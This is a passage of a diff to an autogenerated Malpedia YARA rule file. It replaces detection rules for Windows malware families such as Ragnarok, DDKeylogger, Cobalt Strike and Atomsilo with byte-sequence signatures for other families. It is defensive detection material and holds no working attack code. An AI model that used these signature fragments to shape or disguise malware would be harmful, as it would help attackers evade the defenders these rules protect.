-		$sequence_16 = { 83ec60 c745fc00000000 c745e000000000 6a40 8b450c 50 e8???????? }
-		$sequence_17 = { e8???????? 85c0 7412 ba01000000 b910270000 }
-		$sequence_18 = { 89442420 837c242001 7425 837c242002 }
-		$sequence_19 = { 5e 5b 8be5 5d c3 3de3e00000 7511 }
-		$sequence_20 = { 51 ff15???????? 85c0 0f85ba010000 8b55fc 837a0c00 0f84ad010000 }
-		$sequence_21 = { 8a0410 30443924 41 3b4f04 72ee 8b4704 8bd7 }
-		$sequence_22 = { 7425 837c242002 7441 837c242003 }
-		$sequence_23 = { 0f1086f0000000 c7400410000000 c7400c00000000 0f114014 }
-		$sequence_24 = { 8b442464 89442430 8b442468 89442434 }
-		$sequence_25 = { a810 746a 8b570c 8d8c2460020000 6a00 e8???????? 83c404 }
-		$sequence_26 = { 8bd0 83e20f 8a8c0a00010000 300c18 }
-		$sequence_27 = { 685c020000 6a40 ffd6 0f1005???????? 8bf8 8b4508 0f114714 }
-		$sequence_28 = { 745d 837c242004 7479 837c242005 0f8480000000 e9???????? }
-		$sequence_29 = { c700aaeeddff 33c0 894710 c7470430020000 8d4840 ff15???????? }
+		$sequence_0 = { 488b4c2428 0fbe09 3bc1 7512 }
+		$sequence_1 = { c744242002000000 e9???????? 837c243406 7511 837c243801 750a }
+		$sequence_2 = { 8b00 488b4c2430 488b09 0fbe0401 48634c2404 488b542428 0fbe0c0a }
+		$sequence_3 = { eb43 41b901000000 448b442424 488b542428 488b4c2448 e8???????? }
+		$sequence_4 = { eb1f c744242000000000 4533c9 4533c0 }
+		$sequence_5 = { 488b4c2448 ff15???????? 89442444 837c244400 7502 eb11 }
+		$sequence_6 = { 488d8c0c60020000 ba02000000 486bd200 4803ca 448bc0 488b542420 e8???????? }
+		$sequence_7 = { 66c1ca08 0fb7d2 4c8b8424a0000000 450fb74006 6641c1c808 450fb7c0 4c8b8c24a0000000 }
+		$sequence_8 = { e8???????? b910000000 e8???????? 4889442448 488b442448 488b4c2450 488908 }
+		$sequence_9 = { 4889542410 48894c2408 4883ec78 c744243000000000 c744243400000000 488b942488000000 488d4c2448 }
 
 	condition:
-		7 of them and filesize < 417792
+		7 of them and filesize < 148480
 }
-rule MALPEDIA_Win_Ragnarok_Auto : FILE
+rule MALPEDIA_Win_Nitrogen_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "0503ca8a-2001-56e1-b42c-037f05f91d96"
+		id = "75d54911-9963-5fa1-94d4-824f367ba5ac"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ragnarok"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ragnarok_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nitrogen"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nitrogen_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "5619f0dd5fd5026a251efa6637f932f898dc57a4a8452621caeee9cc8878df0d"
+		logic_hash = "5f8ac2a7555dea7311ca047ff8fe4bf1acad1a9235530176528b358f16735fc3"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107138,32 +107505,34 @@ rule MALPEDIA_Win_Ragnarok_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c1f906 57 6bf838 894df4 8b048d28754300 8b540718 8955ec }
-		$sequence_1 = { 8945b8 8b45a8 8bc8 2345b0 f7d1 234d98 c1c20a }
-		$sequence_2 = { 0f1f4000 8bc8 8b4104 85c0 75f7 895104 8b9db4feffff }
-		$sequence_3 = { 8bc6 f7d0 c1c208 03550c 0bc7 33c3 8955bc }
-		$sequence_4 = { 8b96e0000000 83fa14 7d38 8d0492 8d0c86 8d0492 c781e4000000e0b04000 }
-		$sequence_5 = { 8b7d08 0fb6ca 333c8d105d4300 8bcf 897d08 334814 894d08 }
-		$sequence_6 = { 3a8a54d84200 7532 8b06 8a08 40 42 8906 }
-		$sequence_7 = { c1c10a 89459c 81c6a1ebd96e 8bc2 894d98 }
-		$sequence_8 = { 234db4 03c3 894598 8b45b8 23c2 c145b80a 0bc8 }
-		$sequence_9 = { 8b0c8d28754300 88440f2b 83fa03 7511 8b45fc 8b0c8528754300 8a06 }
+		$sequence_0 = { 8905???????? 488b05???????? 48ffc0 488905???????? }
+		$sequence_1 = { 4898 488905???????? 8b05???????? 488905???????? }
+		$sequence_2 = { 488b05???????? 89442454 8b05???????? 89442458 }
+		$sequence_3 = { 4898 488905???????? 488b05???????? 4885c0 }
+		$sequence_4 = { 0fbe05???????? c1e002 4898 488905???????? }
+		$sequence_5 = { 668905???????? 488b05???????? 48ffc8 488905???????? }
+		$sequence_6 = { 668905???????? 8b05???????? 668905???????? 8b05???????? }
+		$sequence_7 = { eb35 488b05???????? 4885c0 7429 }
+		$sequence_8 = { 8b05???????? ffc0 8905???????? 0fb705???????? }
+		$sequence_9 = { 668905???????? 8b05???????? ffc8 8905???????? }
+		$sequence_10 = { 0fb6c0 8905???????? 8b05???????? 85c0 }
+		$sequence_11 = { 8905???????? 488b05???????? 480faf05???????? 488905???????? }
 
 	condition:
-		7 of them and filesize < 483328
+		7 of them and filesize < 135349248
 }
-rule MALPEDIA_Win_Carrotbat_Auto : FILE
+rule MALPEDIA_Win_Dnspionage_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9e3c15b1-53c0-536f-b748-485d961b1513"
+		id = "f66d8271-cdd2-51ef-96af-74c2c2b12bda"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotbat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.carrotbat_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dnspionage"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dnspionage_auto.yar#L1-L126"
 		license_url = "N/A"
-		logic_hash = "bfaec56400fafcaf85efd0fb6650770c8db082e08e8b7c0c5f56e8a5a426d6b1"
+		logic_hash = "e53e7ef31e7434c4327d38b1a8e0754ac09c84880301d9d6d51e12488698b367"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107177,34 +107546,34 @@ rule MALPEDIA_Win_Carrotbat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff742424 c22800 c744241402000000 66f7d7 9c 89742414 0fcf }
-		$sequence_1 = { 0f84b9000000 8975e0 8b04bd20ee4000 0500080000 3bf0 0f8396000000 }
-		$sequence_2 = { 0f88d7feffff d2df 660fa5cf 5f 660fbaf30b 6681c61cd0 6681cef437 }
-		$sequence_3 = { e8???????? 33cd ff3424 0fbed9 8b5c240c 9c c60424ba }
-		$sequence_4 = { 8bff 56 57 33f6 bf???????? 833cf5a4d5400001 }
-		$sequence_5 = { 7353 8bc1 c1f805 8bf1 83e61f 8d3c8520ee4000 }
-		$sequence_6 = { 7524 a1???????? a3???????? a1???????? c705????????46444000 8935???????? a3???????? }
-		$sequence_7 = { 80e17f 3008 8b06 8bc8 c1f905 8b0c8d20ee4000 83e01f }
-		$sequence_8 = { 3b0d???????? 7353 8bc1 c1f805 8bf1 83e61f 8d3c8520ee4000 }
-		$sequence_9 = { 5f 03d1 5e c6840201ed400000 5b 5d }
+		$sequence_0 = { 99 52 50 e8???????? 83c408 8bd0 b9???????? }
+		$sequence_1 = { 33f6 8b4608 034604 0306 50 }
+		$sequence_2 = { 803d????????00 7517 c605????????01 33c0 c605????????01 5b }
+		$sequence_3 = { ff15???????? 83c404 33c0 5f 5e 5b 8b4df8 }
+		$sequence_4 = { 56 8d8500feffff 8bf1 50 e8???????? 838d0cfeffff07 8b4624 }
+		$sequence_5 = { eb0a 8d0492 8d144509000000 8bcf 43 }
+		$sequence_6 = { c7450c00000000 8d4d0c ba???????? 51 8d4df4 }
+		$sequence_7 = { b9???????? e8???????? 6a00 6a01 e8???????? 8bd0 b9???????? }
+		$sequence_8 = { 83c404 8bf8 33f6 0f1f4000 e8???????? 33d2 }
+		$sequence_9 = { ff15???????? 83bdf8feffff00 764a ff15???????? 85c0 7540 8b85f8feffff }
 
 	condition:
-		7 of them and filesize < 360448
+		7 of them and filesize < 786432
 }
-rule MALPEDIA_Win_Ddkeylogger_Auto : FILE
+rule MALPEDIA_Win_Cobalt_Strike_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "a67b64ba-3a24-5b03-97bb-6fa1fd617831"
+		id = "aab8f287-0819-52fa-8447-761ad2e94a18"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ddkeylogger"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ddkeylogger_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cobalt_strike_auto.yar#L1-L289"
 		license_url = "N/A"
-		logic_hash = "35bb77ee32a1ee4cf41a3e8133dabb1263e352712bd1dfe36cdbb7e1ce08650b"
+		logic_hash = "6946d3d1b89ab18cd12b0ef58b50d5d28d283228462e1be6da78da0efd49ddbb"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -107216,32 +107585,54 @@ rule MALPEDIA_Win_Ddkeylogger_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 88140e 0fb611 feca 88140f 83c102 48 }
-		$sequence_1 = { c1eb06 03de 0fb61493 885102 }
-		$sequence_2 = { 0fb7f1 57 bfffff0000 c745f400000000 }
-		$sequence_3 = { 83c418 8d8de7faffff c745fcffffffff e8???????? 85f6 0f8f14feffff 8b85e0faffff }
-		$sequence_4 = { 8bce eb99 53 8b1d???????? 6a00 ffd3 }
-		$sequence_5 = { 83c8ff e9???????? 8bc6 c1f805 8bfe 53 8d1c8580ee4500 }
-		$sequence_6 = { 83f801 8bc7 7508 8a4c0bff 884c3bff c6043b00 5f }
-		$sequence_7 = { c1fa05 8b149580ee4500 c1e006 8d440224 }
-		$sequence_8 = { 7448 f7c200f00000 7420 f7c200c00000 740c f7c200800000 0f95c0 }
-		$sequence_9 = { 56 ff15???????? 56 8bf8 ff15???????? 3b3d???????? }
+		$sequence_0 = { 3bc7 750d ff15???????? 3d33270000 }
+		$sequence_1 = { e9???????? eb0a b801000000 e9???????? }
+		$sequence_2 = { ff15???????? 85c0 741d ff15???????? 85c0 7513 }
+		$sequence_3 = { ff7608 83660400 e8???????? 59 }
+		$sequence_4 = { ff15???????? 59 a807 7501 4e }
+		$sequence_5 = { ff75f8 ff75fc ff15???????? 83c40c eb15 ff75fc }
+		$sequence_6 = { ff7604 ff75fc ff15???????? 83c410 }
+		$sequence_7 = { ff15???????? 59 c70601000000 e9???????? }
+		$sequence_8 = { ff7604 e8???????? 014604 83c410 014608 }
+		$sequence_9 = { 85c0 7405 e8???????? 8b0d???????? 85c9 }
+		$sequence_10 = { e9???????? 833d????????01 7505 e8???????? }
+		$sequence_11 = { 8bd0 e8???????? 85c0 7e0e }
+		$sequence_12 = { f7d8 1bc9 4423f9 488d4ddf e8???????? }
+		$sequence_13 = { c1ef03 8bc7 ffc0 81ff80000000 720b eb05 }
+		$sequence_14 = { 488bd7 488bcf e8???????? 85c0 7569 498bcf }
+		$sequence_15 = { 83f801 750e e8???????? 4c8d2dca1e0000 eb16 e8???????? 8bd8 }
+		$sequence_16 = { 7409 c745f040000000 eb07 c745f004000000 }
+		$sequence_17 = { 52 8b4508 8b08 ffd1 85c0 }
+		$sequence_18 = { 837d0c00 7422 837d1000 761c 837d1404 }
+		$sequence_19 = { 6a20 8b4d10 51 8b550c 52 }
+		$sequence_20 = { 8b5514 52 8b450c 8b4850 }
+		$sequence_21 = { 56 57 8b4510 8b4850 }
+		$sequence_22 = { 8b4510 8b4850 8b550c 8d440ac0 }
+		$sequence_23 = { b940000000 f3aa 5f 5e }
+		$sequence_24 = { 488b842490000000 8b4050 488b8c2488000000 488d4401c0 }
+		$sequence_25 = { c644246856 c644246969 c644246a72 c644246b74 c644246c75 }
+		$sequence_26 = { 4889442418 48837c242800 0f8496010000 488b0424 0fb700 66c1e80c }
+		$sequence_27 = { 4803c8 488bc1 4889442408 488b442410 8b4004 4883e808 33d2 }
+		$sequence_28 = { 488bc1 4889442450 488b442450 4883c002 488b7c2420 }
+		$sequence_29 = { 488b842490000000 ff5008 488b8c2490000000 48894110 488d542458 488b4c2420 }
+		$sequence_30 = { 488b0c24 0fb709 6623c8 0fb7c1 0fb7c0 488b4c2408 488b0401 }
+		$sequence_31 = { c644247600 488d4c2428 488b842490000000 ff10 4889442420 }
 
 	condition:
-		7 of them and filesize < 808960
+		7 of them and filesize < 1015808
 }
-rule MALPEDIA_Win_Pgift_Auto : FILE
+rule MALPEDIA_Win_Yayih_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5134e180-c701-504d-b27b-1f2a37782304"
+		id = "20c4d84b-adf0-50ee-81d6-f74bed13f2d6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pgift_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.yayih"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.yayih_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "86543d2a9c2965bb35bf9078bd182bce16bae717918e12d47f187ce1755d9b8f"
+		logic_hash = "ccf9d220b177854895c46141d0b55d3d71e3c288e2342d7f6d4b5f34327dab2f"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107255,34 +107646,34 @@ rule MALPEDIA_Win_Pgift_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { c645fc03 e8???????? ff7510 8d4de8 }
-		$sequence_1 = { e8???????? 8d7e01 57 ebac }
-		$sequence_2 = { 53 6a11 ff15???????? 8bd8 8d45ec }
-		$sequence_3 = { 53 6a01 6800000040 ff75ec ff15???????? 8bd8 }
-		$sequence_4 = { 7408 ff4510 83c710 eb99 8b4e14 }
-		$sequence_5 = { 89450c 8d45e4 53 50 8d4594 50 }
-		$sequence_6 = { 50 8d4de4 e8???????? 33db 8d8de4feffff 895dfc 895dec }
-		$sequence_7 = { 8d4de8 c645fc01 e8???????? 83f8ff 750f 6a2f 8d4de8 }
-		$sequence_8 = { e9???????? 8b4d08 8bc3 2bc1 c1f802 3bc7 7369 }
-		$sequence_9 = { e8???????? ff75e8 ff15???????? eb53 8b45ec 3958f8 742f }
+		$sequence_0 = { 6a01 8d459c 5f 6689b548ffffff 50 }
+		$sequence_1 = { ff75f8 ff15???????? 8d85bcd8ffff 50 e8???????? 80bc05bbd8ffff3e }
+		$sequence_2 = { 8a1c33 80eb03 ff4508 8819 49 }
+		$sequence_3 = { e8???????? 59 59 8d85f0fdffff 68???????? }
+		$sequence_4 = { 7517 ff45e0 817de050c30000 0f8cecfdffff 33f6 e9???????? 6a44 }
+		$sequence_5 = { 83650800 8b550c 8d78ff 59 85ff }
+		$sequence_6 = { 8d8570fdffff 68???????? 50 ff15???????? 83c410 3bc3 894508 }
+		$sequence_7 = { 50 56 ff15???????? bf04010000 }
+		$sequence_8 = { c785f0feffff28000000 6a0c 8d45d0 56 50 e8???????? 6801200000 }
+		$sequence_9 = { 68???????? 50 e8???????? 59 8d85c0feffff 59 50 }
 
 	condition:
-		7 of them and filesize < 98304
+		7 of them and filesize < 57344
 }
-rule MALPEDIA_Win_Tildeb_Auto : FILE
+rule MALPEDIA_Win_Strongpity_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c974fa6c-0d31-59bc-a143-d1c23bc433da"
+		id = "14bad2bc-8b1c-5604-a8c5-9e952bb2db14"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.tildeb"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.tildeb_auto.yar#L1-L129"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.strongpity"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.strongpity_auto.yar#L1-L178"
 		license_url = "N/A"
-		logic_hash = "7842b223356a837886d4f126b2b0f2ea5dcea94b3925e6e82a6b6f41a78e7627"
-		score = 75
-		quality = 75
+		logic_hash = "489b26cd26695d5bf1487fe83576061d12be04bfa204a50dba999c14e24baf44"
+		score = 60
+		quality = 45
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -107294,32 +107685,38 @@ rule MALPEDIA_Win_Tildeb_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bbc24e0000000 03fb 03ef 8b3d???????? }
-		$sequence_1 = { ff15???????? e9???????? 6810270000 8b0d???????? 51 ff15???????? 85c0 }
-		$sequence_2 = { 83c8ff 5e 81c494010000 c3 b80a000000 5e 81c494010000 }
-		$sequence_3 = { 8d4c2420 e8???????? 50 ff15???????? 8bf8 83c9ff 33c0 }
-		$sequence_4 = { 50 51 ff15???????? 3d040000c0 7516 8b16 }
-		$sequence_5 = { b9???????? e8???????? 6a00 6a04 8d85e0f9ffff 50 }
-		$sequence_6 = { 8d85e4f9ffff 50 6800040000 ff15???????? 8d8de0f5ffff 51 6a00 }
-		$sequence_7 = { 33dd 8bac24d0000000 899c24ec000000 8b9c24e4000000 33dd 8bac24b8000000 33dd }
-		$sequence_8 = { 89442460 8b442454 8d4c2458 33f0 51 89742468 e8???????? }
-		$sequence_9 = { 85c0 7507 c605????????01 68???????? 68???????? 8b3d???????? ffd7 }
+		$sequence_0 = { ff15???????? 85c0 74b8 6a14 59 }
+		$sequence_1 = { 6a1f 56 ff15???????? 33c0 50 ff7710 }
+		$sequence_2 = { 8b45ec 6a02 5a 663938 750d 49 03c2 }
+		$sequence_3 = { 740d 817df4c8000000 7504 8bc6 }
+		$sequence_4 = { 85ff 7507 33c0 e9???????? b90a020000 33d2 8810 }
+		$sequence_5 = { 83e901 75f8 8bcb 897dd0 c745d404010000 }
+		$sequence_6 = { 7433 53 56 ff15???????? 85c0 7427 53 }
+		$sequence_7 = { 8819 41 83e801 75f8 ff75d0 68???????? }
+		$sequence_8 = { 5e 5d 8d432f 5b 8b4c2418 }
+		$sequence_9 = { 5e 5d 8bc3 5b 83c410 c3 8b464c }
+		$sequence_10 = { 5e 5d b803000000 5b 59 c3 8b06 }
+		$sequence_11 = { 5e 5d 8d431b 5b 8b8c24a8090000 }
+		$sequence_12 = { 5e 5d 8919 33c0 5b 59 }
+		$sequence_13 = { 5e 5d 8bc3 c7826c02000001000000 5b 83c410 }
+		$sequence_14 = { 5e 5d b809000000 5b 83c408 c3 8b4640 }
+		$sequence_15 = { 7410 5f c7866c02000001000000 5e 83c410 c3 }
 
 	condition:
-		7 of them and filesize < 8532488
+		7 of them and filesize < 999424
 }
-rule MALPEDIA_Win_5T_Downloader_Auto : FILE
+rule MALPEDIA_Win_Atomsilo_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "c4a370ca-6c61-5c78-8868-cd8df81cd00c"
+		id = "3a4d686f-c99d-5c01-b555-7095e6b70c0c"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.5t_downloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.5t_downloader_auto.yar#L1-L114"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.atomsilo"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.atomsilo_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "584a19ffb7b53f3b149aeb982ecf23155ae77e2c2b57bc23c34103eb885f8cf5"
+		logic_hash = "8aed315237abd1e84c2f2f4a7b7891e44774fb638cce5cdf1ee6cabd913c51c4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107333,32 +107730,32 @@ rule MALPEDIA_Win_5T_Downloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7403 5d ffe1 83c8ff }
-		$sequence_1 = { 55 8bec 8b4508 85c0 7416 83781400 7510 }
-		$sequence_2 = { 8b4508 85c0 7416 83781400 7510 }
-		$sequence_3 = { 83781800 7403 5d ffe1 }
-		$sequence_4 = { 85c9 7409 83781800 7403 5d ffe1 83c8ff }
-		$sequence_5 = { 85c9 7409 83781800 7403 5d ffe1 }
-		$sequence_6 = { 83781800 7403 5d ffe1 83c8ff }
-		$sequence_7 = { 85c9 7409 83781800 7403 }
-		$sequence_8 = { 85c0 7416 83781400 7510 }
-		$sequence_9 = { 7409 83781800 7403 5d }
+		$sequence_0 = { 48c7c03f000000 23c1 488d0d7a8d0100 f20f5904c1 f20f5804c1 660f72e406 660f73f434 }
+		$sequence_1 = { 90 488d4f78 488d542458 e8???????? 488bd8 488b4c2470 48394c2468 }
+		$sequence_2 = { 4053 4883ec20 488d054b400800 488bd9 488901 488d052e420800 48894108 }
+		$sequence_3 = { 480134c7 0f8593010000 ffc1 8bc1 493bc0 72ed 488b5318 }
+		$sequence_4 = { 48c7442458ffffffff 4c89742460 4d85f6 7505 498bef eb0b 498bce }
+		$sequence_5 = { 4183cf08 44897c2420 4c8d4c2458 4c8bc6 488d55b8 488d4d88 e8???????? }
+		$sequence_6 = { 4103c7 c1ca02 448b7c2408 03c8 4403c9 4433ff }
+		$sequence_7 = { 8bc9 488b542430 8b0c8a c1e908 0fb6c9 488d1554b50500 }
+		$sequence_8 = { 488d0dda730900 8b542440 83c202 8bd2 4c8b442430 418b1490 c1ea10 }
+		$sequence_9 = { 488bd0 488bcb e8???????? 4103f5 413bf4 72c1 488b45a7 }
 
 	condition:
-		7 of them and filesize < 539648
+		7 of them and filesize < 1785856
 }
-rule MALPEDIA_Win_Nailao_Locker_Auto : FILE
+rule MALPEDIA_Win_Ice_Cache_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "e45fdbac-42d1-5920-9b35-9a9e44ef7d5d"
+		id = "2bb6d9ef-4306-54f0-bb68-5fe8abb99071"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nailao_locker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nailao_locker_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ice_cache"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ice_cache_auto.yar#L1-L127"
 		license_url = "N/A"
-		logic_hash = "b259eb4feabff6fee143b3ad97a8691b9630885ab19604f45e8a846a4deaff46"
+		logic_hash = "257ed7cb63e1c0858485a90386f353a13f9ab5e026a2c8483909741253dfdd4d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107372,32 +107769,32 @@ rule MALPEDIA_Win_Nailao_Locker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff15???????? 4c8d4c2474 488bcb 4c8d44246c 488d542464 ff15???????? }
-		$sequence_1 = { 488bc5 4c8d0551650100 488bcd 48c1f906 83e03f 498b0cc8 488d14c0 }
-		$sequence_2 = { 488bd8 4885c0 7560 488bc7 4c8d35104cffff 498784f620120200 }
-		$sequence_3 = { e8???????? 4c8d458c 488bd7 85c0 7411 448bc8 488d0ddd7a0100 }
-		$sequence_4 = { 48c744242000000000 488bce ff15???????? 85c0 741d 41ffc6 }
-		$sequence_5 = { c705????????01000000 b808000000 486bc000 488d0d19d80100 8b542430 48891401 }
-		$sequence_6 = { 488d0ddd7a0100 e8???????? eb58 488d0d1f7b0100 eb47 488d1596790100 488bcb }
-		$sequence_7 = { e8???????? 488d156f870100 488d4c2420 e8???????? }
-		$sequence_8 = { ff15???????? 85c0 750d 4c8d442450 488bd7 e8???????? 83eb01 }
-		$sequence_9 = { 488985d0070000 49895b20 488bfa 498973e8 4d896bd8 4d8be8 }
+		$sequence_0 = { 4156 4157 4883ec30 488b19 498be8 4c8bf2 }
+		$sequence_1 = { 488bd9 4885c0 7479 488d0d0a520200 483bc1 746d 488b83e0000000 }
+		$sequence_2 = { 33d2 498bce e8???????? 90 488d8c24080f0000 e8???????? e9???????? }
+		$sequence_3 = { 0f114a10 4c894110 48c741180f000000 448801 44894220 4883c420 }
+		$sequence_4 = { 48f7d0 493bc6 0f8694000000 48897c2430 4a8d3c01 4d85f6 746d }
+		$sequence_5 = { 488b542448 488d4c2448 e8???????? e8???????? e8???????? 0fb6c3 488b4c2468 }
+		$sequence_6 = { 744c 0fb618 48ffc0 48894710 83fbff 7440 }
+		$sequence_7 = { 74e8 488bd8 4889442470 493bdf 7410 488d5320 498bce }
+		$sequence_8 = { 7536 4c8bc7 488d1502700300 660f1f440000 0fb702 663901 }
+		$sequence_9 = { 418bf0 4c8d0d0f870100 8bda 4c8d05fe860100 }
 
 	condition:
-		7 of them and filesize < 512000
+		7 of them and filesize < 801792
 }
-rule MALPEDIA_Win_Orpcbackdoor_Auto : FILE
+rule MALPEDIA_Win_Httpbrowser_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "cd974481-8117-5632-aade-5ef10c39e2d5"
+		id = "ae4ee866-262a-554a-b946-19e1882a583d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.orpcbackdoor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.orpcbackdoor_auto.yar#L1-L132"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.httpbrowser"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.httpbrowser_auto.yar#L1-L169"
 		license_url = "N/A"
-		logic_hash = "dd9da45feb732da3d95212bca52a2ed758b546277cb96d095b747d85f59e36f4"
+		logic_hash = "fe5c658a5d4b7829560ab47b5951aa60c2bf887992bf53e66e96f138e4aa0991"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -107411,32 +107808,38 @@ rule MALPEDIA_Win_Orpcbackdoor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8d45a4 50 e8???????? 59 6a0b 59 8bf0 }
-		$sequence_1 = { 8b4df0 e8???????? 8945d8 33c0 8b4de4 83c101 }
-		$sequence_2 = { e8???????? 8d8d18ebfeff e8???????? 8d8d48f4feff e8???????? 8d8d30f4feff e8???????? }
-		$sequence_3 = { 50 8d8de8ecffff e8???????? ff30 8d8d10e9ffff e8???????? }
-		$sequence_4 = { 50 e8???????? 59 8845d4 8d45d0 50 8d45f8 }
-		$sequence_5 = { 8b85ccfdffff 8b00 ffb5ccfdffff ff5024 89859cfdffff 8d8d50fdffff e8???????? }
-		$sequence_6 = { 750a 68???????? e8???????? 8b45f0 833822 750a 68???????? }
-		$sequence_7 = { 817df8ff0f0000 7649 8b45f0 ff704c 68ff0f0000 6a01 ff7508 }
-		$sequence_8 = { a1???????? 33c5 8945fc 894df0 8365e800 8b45f0 8b00 }
-		$sequence_9 = { eb9e 8d8508f8feff 50 8d8da0fbfeff e8???????? 6a01 8d8da8fcfeff }
+		$sequence_0 = { 751d 68???????? ffb5f0fdffff ff15???????? ffb5f0fdffff ff15???????? 56 }
+		$sequence_1 = { 6800010000 8d85f8feffff 50 ff15???????? 8d85f8feffff }
+		$sequence_2 = { 8bec 81ecac020000 a1???????? 33c5 8945fc 57 8d8558fdffff }
+		$sequence_3 = { eb3c 8b85e4fdffff 8985f4fdffff 3bc6 74ec 53 }
+		$sequence_4 = { 33db 56 8985e8eeffff 8d85fdeeffff 53 50 8bf9 }
+		$sequence_5 = { 6a04 8d85a0feffff 50 6a13 }
+		$sequence_6 = { ffd6 83bd6453ffff14 7552 8d85c855ffff 50 }
+		$sequence_7 = { 8d85fefdffff 50 e8???????? ffb5f4edffff }
